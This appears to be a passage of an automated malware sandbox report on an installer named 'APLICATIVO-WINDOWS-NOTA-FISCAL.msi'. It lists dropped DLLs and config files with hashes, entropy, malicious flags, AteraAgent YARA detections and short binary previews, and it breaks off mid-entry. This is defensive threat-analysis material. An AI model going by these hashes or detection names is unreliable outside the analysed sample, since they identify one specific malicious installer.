                                                                                                                                                                                                                                                                                              SHA-256:498F62488B0E45B8715E152899F5921C648EC190A1570B2978F9DB37CA2A42B0
                                                                                                                                                                                                                                                                                              SHA-512:3FB1CA8E06231BD21C3718B07FB6DD92F7E907BECD08275BB88C3350F97512070830887116EB7B1351D73CD37BF08952175C56351DD94E2B6C425A997082A1A7
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI41D0.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI41D0.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:...@IXOS.@.....@C7&Z.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent".APLICATIVO-WINDOWS-NOTA-FISCAL.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........StopAteraServiceQuiet....J...StopAteraServiceQuiet.@A......M..MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI41D1.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):216496
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                                              MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                                              SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                                              SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                                              SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI422F.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):216496
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                                              MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                                              SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                                              SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                                              SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI432A.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):216496
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                                              MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                                              SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                                              SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                                              SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI5085.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):521954
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                              MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                              SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                              SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                              SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI5085.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25600
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                                              MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                                              SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                                              SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                                              SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI5085.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI5085.tmp-\CustomAction.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1538
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                                              MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                                              SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                                              SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                                              SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI5085.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):184240
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                                              MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                                              SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                                              SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                                              SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI5085.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):711952
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                                              MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                                              SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                                              SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                                              SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI5085.tmp-\System.Management.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):61448
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                                              MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                                              SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                                              SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                                              SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI56F2.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):521954
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                              MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                              SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                              SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                              SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI56F2.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25600
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                                              MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                                              SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                                              SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                                              SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI56F2.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI56F2.tmp-\CustomAction.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1538
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                                              MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                                              SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                                              SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                                              SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI56F2.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):184240
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                                              MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                                              SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                                              SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                                              SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI56F2.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):711952
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                                              MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                                              SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                                              SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                                              SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSI56F2.tmp-\System.Management.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
